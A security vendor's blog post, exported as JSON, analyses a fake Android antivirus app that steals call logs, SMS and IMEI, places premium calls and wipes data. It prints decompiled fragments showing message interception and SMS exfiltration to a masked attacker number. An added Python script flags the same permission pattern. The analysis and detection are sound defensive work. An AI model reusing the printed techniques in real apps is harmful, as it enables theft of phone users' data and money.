{"id":77820,"date":"2014-02-10T16:47:33","date_gmt":"2014-02-10T11:17:33","guid":{"rendered":"https:\/\/blogs.quickheal.com\/?p=77820"},"modified":"2014-02-10T16:47:33","modified_gmt":"2014-02-10T11:17:33","slug":"fake-android-antivirus-alert","status":"publish","type":"post","link":"https:\/\/www.quickheal.com\/blogs\/fake-android-antivirus-alert\/","title":{"rendered":"Fake Android Antivirus Alert!"},"content":{"rendered":"<p style=\"text-align: left;\">A new malicious application is circulating that poses as antivirus software for Android devices. In this post, we give a quick overview of what this malware does and how it works.<\/p>\n<p style=\"text-align: center;\"><a href=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2014\/02\/image1.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-77821 aligncenter\" alt=\"image1\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2014\/02\/image1.png\" width=\"240\" height=\"432\" \/><\/a><\/p>\n<p>Quick Heal detects this Android malware as <span style=\"color: #666666;\">Android.Agent.BU.<\/span> Before installation, the application asks the user for device administrator rights, displaying two options \u2013 \u2018<b>Cancel<\/b>\u2019 and \u2018<b>Activate<\/b>\u2019 (refer to fig. a). This is where the catch lies: even if the user chooses \u2018Cancel\u2019, the application gets installed and takes the administrator rights anyway. Device administrator status matters because an app that holds it cannot be uninstalled until that status is revoked in the device administrator settings.<\/p>\n<p style=\"text-align: center;\"><a href=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2014\/02\/android_fake_antivirus2.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-77824 aligncenter\" alt=\"android_fake_antivirus\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2014\/02\/android_fake_antivirus2.png\" width=\"240\" height=\"432\" \/><\/a><br \/>\nFig.
a<\/p>\n<p>After the fake antivirus is installed, it offers the user several options for scanning the mobile device (refer to fig. b).<\/p>\n<p style=\"text-align: center;\"><a href=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2014\/02\/android_fake_antivirus1.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-77823 aligncenter\" alt=\"android_fake_antivirus1\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2014\/02\/android_fake_antivirus1.png\" width=\"240\" height=\"432\" \/><\/a><br \/>\nFig. b<\/p>\n<p>Choosing any of these options triggers the malicious activity in the background, while to the user it looks like an ordinary virus scan.<\/p>\n<p><span style=\"color: #ff6600; font-size: 16px;\">The malware is designed to perform the following activities in the background<\/span>:<\/p>\n<p><strong>1<\/strong>. Stealing the following information from the compromised phone and sending it to the attacker:<\/p>\n<ul>\n<li>Phone number<\/li>\n<li>Call type<\/li>\n<li>Date of call<\/li>\n<li>Call duration<\/li>\n<li>Call list<\/li>\n<li>Bot_id<\/li>\n<li>IMEI (International Mobile Station Equipment Identity) number<\/li>\n<\/ul>\n<p><strong>2<\/strong>. Stealing text messages from the device\u2019s Inbox.<\/p>\n<p><strong>3<\/strong>. Erasing user data from the compromised phone, including data on the SD card.<\/p>\n<p><strong>4<\/strong>.
Calling and sending SMSs to premium-rate numbers without the user\u2019s knowledge.<\/p>\n<p><span style=\"font-size: 15px; color: #006bb2; font-family: verdana; font-weight: bold;\"><span style=\"text-decoration: underline;\">Technically, here&#8217;s how the malware functions<\/span>:<\/span><\/p>\n<p><strong>Activity<\/strong>:<\/p>\n<p>&#8211; com.soft360.iService.MainActivity<\/p>\n<p>&#8211; com.BioTechnology.iClientsService.IncomingCallActivity<\/p>\n<p><strong>Service<\/strong>:<\/p>\n<p>&#8211; com.soft360.iService.AService<\/p>\n<p>&#8211; com.soft360.iService.webService<\/p>\n<p><strong>Receiver<\/strong>:<\/p>\n<p>&#8211; com.soft360.iService.Alarm<\/p>\n<p>&#8211; com.soft360.iService.AutoStart<\/p>\n<p>&#8211; com.soft360.web.MyAdmin<\/p>\n<p><strong>Permission<\/strong>:<\/p>\n<p>&#8211; android.permission.READ_PHONE_STATE<\/p>\n<p>&#8211; android.permission.ACCESS_WIFI_STATE<\/p>\n<p>&#8211; android.permission.CHANGE_WIFI_STATE<\/p>\n<p>&#8211; android.permission.CALL_PHONE<\/p>\n<p>&#8211; android.permission.ACCESS_NETWORK_STATE<\/p>\n<p>&#8211; android.permission.CHANGE_NETWORK_STATE<\/p>\n<p>&#8211; android.permission.WRITE_EXTERNAL_STORAGE<\/p>\n<p>&#8211; android.permission.INTERNET<\/p>\n<p>&#8211; android.permission.RECEIVE_BOOT_COMPLETED<\/p>\n<p>&#8211; android.permission.WRITE_SMS<\/p>\n<p>&#8211; android.permission.READ_SMS<\/p>\n<p>&#8211; android.permission.RECEIVE_SMS<\/p>\n<p>&#8211; android.permission.SEND_SMS<\/p>\n<p>&#8211; android.permission.READ_CONTACTS<\/p>\n<p>&#8211; android.permission.RECORD_AUDIO<\/p>\n<p>The SMS, CALL_PHONE, READ_CONTACTS and RECORD_AUDIO permissions have no place in a virus scanner. Together with RECEIVE_BOOT_COMPLETED, which lets the app restart after a reboot, the SMS and call permissions are exactly what activities 1 to 4 above require.<\/p>\n<p><strong>Code Snippet:<\/strong><\/p>\n<p>In MainActivity the app builds an explicit intent carrying the SMS_RECEIVED action, targets its own SmsReciever class and broadcasts it:<\/p>\n<p>String str1 = \"android.provider.Telephony.SMS_RECEIVED\";<\/p>\n<p>Intent localIntent1 = new Intent(str1);<\/p>\n<p>MainActivity localMainActivity1 = this;<\/p>\n<p>Class&lt;SmsReciever&gt; localSmsReciever = SmsReciever.class;<\/p>\n<p>Intent localIntent2 = localIntent1.setClass(localMainActivity1, localSmsReciever);<\/p>\n<p>sendBroadcast(localIntent1);<\/p>\n<p><strong>In SmsReciever<\/strong><\/p>\n<p><strong>1)<\/strong> The receiver extracts the body and the sender of each incoming message:<\/p>\n<p>String str2 = localSmsMessage1.getDisplayMessageBody().toString();<\/p>\n<p>str2 holds the text of the received message.<\/p>\n<p>String str3 = localSmsMessage1.getOriginatingAddress().trim();<\/p>\n<p>str3 holds the number the message was received from.<\/p>\n<p><strong>2)<\/strong> The following snippet reads the numbers in the phone\u2019s call list and sends them out:<\/p>\n<p>if (localsmsParser.isCallList())<\/p>\n<p>{<\/p>\n<p>localdbActions.sent_Call_Details();<\/p>\n<p>continue;<\/p>\n<p>}<\/p>\n<p><em>Note<\/em>: The SmsReciever class checks incoming SMSs against the number 79********54.<\/p>\n<p><strong>3)<\/strong> The SmsReciever class calls the dbAction class. The following dbAction methods carry out the malicious activity:<\/p>\n<p>a) sent_Call_Details()<br \/>\nb) get_sms_list()<br \/>\nc) getIMEI()<br \/>\ne) setCALL(int paramInt)<br \/>\nf) setSMS(int paramInt)<\/p>\n<p><strong>In WebService Root class:<\/strong><\/p>\n<p>1) initDeviceServ() is called from the Alarm class. It first checks whether the send_sms_count counter is greater than 1:<\/p>\n<p>if (this.send_sms_count &gt; 1);<\/p>\n<p>try<\/p>\n<p>{<\/p>\n<p>&#8211; Str1 = i am<\/p>\n<p>&#8211; localStringBuilder1 = i am (<\/p>\n<p>&#8211; Str2 = Sim Number<\/p>\n<p>&#8211; localStringBuilder2 = Sim Number (<\/p>\n<p>&#8211; Str3 = Device Name<\/p>\n<p>&#8211; Str4 = Device Name )<\/p>\n<p>&#8211; Str5 = phone number (79*******45)<\/p>\n<p>It then sends the assembled message (str4) by SMS to the number held in str5, 79*******45:<\/p>\n<p>localSmsManager.sendTextMessage(str5, null, str4, null, null);<\/p>\n<p style=\"text-align: center;\"><a
href=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2014\/02\/android_fake_antivirus21.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-77826 aligncenter\" alt=\"android_fake_antivirus2\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2014\/02\/android_fake_antivirus21.jpg\" width=\"527\" height=\"402\" \/><\/a><\/p>\n<p><strong>Destination Number:<\/strong><\/p>\n<p>+44********30 is one of the numbers to which the stolen user data is sent. It is hard-coded as a string resource in the APK:<\/p>\n<p>&lt;string name=&quot;def_tel_number&quot;&gt;+44********30&lt;\/string&gt;<\/p>\n<p>Before installing any application on your phone, review its permissions carefully, and research the publisher. An antivirus app has no reason to ask for permission to send SMSs, make calls or become a device administrator. If such an app is already installed, revoke its device administrator status before uninstalling it, since Android will not remove an active administrator. While it may be difficult to tell a genuine application from a fake one, <a href=\"https:\/\/play.google.com\/store\/apps\/details?id=com.quickheal.platform.advance.blue\" target=\"_blank\">Quick Heal Mobile Security<\/a> ensures that only clean software is installed on your phone.<\/p>\n<p><span style=\"color: #808080;\">Blog post acknowledgement:<\/span> <em>Quick Heal Threat Research and Response Team.<\/em><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Apparently, a new malicious application is on the loose that poses as an antivirus software for Android devices. In this post, we give you a quick brief about what this malware is all about. Quick Heal has detected this Android malware as Android.Agent.BU. Before installation, the application asks the user for administrator rights.
It displays [&hellip;]<\/p>\n","protected":false},"author":6,"featured_media":77837,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[55,24,4],"tags":[380,882,883,274,26],"class_list":["post-77820","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-android","category-malware","category-news","tag-android-malware","tag-android-roguware","tag-fake-antivirus","tag-google-play","tag-rogueware"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/77820"}],"collection":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/comments?post=77820"}],"version-history":[{"count":0,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/77820\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/media?parent=77820"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/categories?post=77820"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/tags?post=77820"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
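The permission list and the def_tel_number string resource in the post are the two cheapest static indicators of this sample. What follows is an added example, not Quick Heal's code or a Quick Heal detection signature: a Python triage script that parses a constructed AndroidManifest.xml fragment (the post's permission list, duplicates included, plus the three receivers it names) and a constructed strings.xml (the phone number is a placeholder, because the post masks the real value), then reports which capabilities the permission set grants, which permissions an antivirus app has no business requesting, whether the SMS-bot combination is present, and any phone numbers hard-coded as string resources. The capability rules and the antivirus baseline are the author's own heuristics.

```python
"""Static triage of an Android manifest and string resources for the
fake-antivirus / SMS-bot pattern described in the post (added example,
not Quick Heal's code or signature; rules are the author's heuristics)."""
import re
import xml.etree.ElementTree as ET
from collections import Counter

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
PERM_PREFIX = "android.permission."

# Constructed AndroidManifest.xml: the post's permission list, duplicates
# included, plus the three receivers it names. Not the real manifest.
MANIFEST_XML = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.soft360.iService">
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
  <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.CALL_PHONE"/>
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
  <uses-permission android:name="android.permission.CHANGE_NETWORK_STATE"/>
  <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.WRITE_SMS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <application>
    <receiver android:name="com.soft360.iService.Alarm"/>
    <receiver android:name="com.soft360.iService.AutoStart"/>
    <receiver android:name="com.soft360.web.MyAdmin"/>
  </application>
</manifest>
"""

# Constructed res/values/strings.xml; the number is a placeholder because
# the post masks the real def_tel_number value.
STRINGS_XML = """<resources>
  <string name="def_tel_number">+4400000000</string>
  <string name="scan_done">Scan complete</string>
</resources>
"""

# Each capability requires all of the listed (unprefixed) permissions.
CAPABILITIES = {
    "intercept incoming SMS": {"RECEIVE_SMS"},
    "read the SMS inbox": {"READ_SMS"},
    "send SMS (premium-rate fraud, SMS-based C2)": {"SEND_SMS"},
    "place calls": {"CALL_PHONE"},
    "read IMEI and phone number": {"READ_PHONE_STATE"},
    "restart after reboot": {"RECEIVE_BOOT_COMPLETED"},
    "harvest contacts": {"READ_CONTACTS"},
    "record audio": {"RECORD_AUDIO"},
}
# Heuristic baseline of what an on-device scanner plausibly needs.
ANTIVIRUS_BASELINE = {"INTERNET", "ACCESS_NETWORK_STATE", "ACCESS_WIFI_STATE",
                      "WRITE_EXTERNAL_STORAGE", "RECEIVE_BOOT_COMPLETED"}

PHONE_RE = re.compile(r"^\+?\d{7,15}$")


def manifest_permissions(xml_text):
    """Count android:name values of every <uses-permission> element."""
    root = ET.fromstring(xml_text)
    return Counter(el.get(ANDROID_NS + "name") for el in root.iter("uses-permission"))


def manifest_receivers(xml_text):
    """List the android:name of every <receiver> element, in manifest order."""
    root = ET.fromstring(xml_text)
    return [el.get(ANDROID_NS + "name") for el in root.iter("receiver")]


def triage(manifest_xml):
    counts = manifest_permissions(manifest_xml)
    short = {p[len(PERM_PREFIX):] for p in counts if p.startswith(PERM_PREFIX)}
    return {
        "capabilities": [c for c, need in CAPABILITIES.items() if need <= short],
        "unexpected_for_antivirus": sorted(short - ANTIVIRUS_BASELINE),
        # intercept + send + survive reboot is the core SMS-bot combination
        "sms_bot_pattern": {"RECEIVE_SMS", "SEND_SMS", "RECEIVE_BOOT_COMPLETED"} <= short,
        "duplicate_declarations": sorted(p for p, n in counts.items() if n > 1),
    }


def hardcoded_numbers(strings_xml):
    """Map string-resource names to values that look like phone numbers."""
    root = ET.fromstring(strings_xml)
    return {el.get("name"): el.text.strip() for el in root.iter("string")
            if el.text and PHONE_RE.match(el.text.strip())}


if __name__ == "__main__":
    for key, value in triage(MANIFEST_XML).items():
        print(f"{key}: {value}")
    print("receivers:", manifest_receivers(MANIFEST_XML))
    print("hard-coded numbers:", hardcoded_numbers(STRINGS_XML))
```

On a real APK the two inputs come from the decoded manifest and res/values/strings.xml; the duplicate-declaration count is reported only as a curiosity, since Android merges duplicates, whereas the unexpected-permission list and the SMS-bot flag are the signals worth acting on.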